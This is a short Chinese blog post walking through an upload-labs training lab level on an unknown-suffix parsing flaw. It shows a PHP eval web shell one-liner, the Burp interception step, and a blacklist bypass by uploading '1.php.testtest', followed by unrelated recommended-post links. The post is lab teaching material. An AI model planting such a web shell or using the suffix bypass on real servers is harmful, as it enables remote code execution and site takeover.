upload-labs靶场未知后缀名解析漏洞

upload-labs靶场未知后缀名解析漏洞

版本影响:

phpstudy 版本:5.2.17

1 环境搭建

1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
复制代码
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
复制代码
http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
复制代码
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发

修改php后缀和文件内容类型,进行转发,返回信息提示上传成功

访问不能执行

结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest

上传1.php.testtest成功

相关推荐
咖啡の猫10 小时前
Redis命令-Hash命令
redis·php·哈希算法
Jay-r10 小时前
OpenClaw养龙虾工具安全风险分析:五大隐患及防护建议引言
网络·python·安全·web安全·ai助手·openclaw
混凝土拌意大利面11 小时前
区块链|WEB3:时间长河共识算法(Time River Consensus Algorithm)
安全·web安全·区块链·共识算法
惊岁晚12 小时前
【WSL】访问443端口被拒
网络安全
会编程的土豆12 小时前
【从零学javase 第六天】网络编程(+多线程)
开发语言·网络·php
道清茗12 小时前
【RH134知识点问答题】第11章 管理网络安全
linux·安全·web安全
云云只是个程序马喽13 小时前
海外短剧系统开发:支持多语言多支付海外上架app
php
vortex515 小时前
evil-winrm 与 evil-winrm-py 使用指南
网络安全·渗透测试·kali
德迅云安全杨德俊15 小时前
筑牢企业服务器防线:安全体系构建实操手册
网络·安全·web安全
xixixi7777715 小时前
数字世界的攻防战:网络安全的演进之路
网络·人工智能·安全·web安全·网络安全·攻击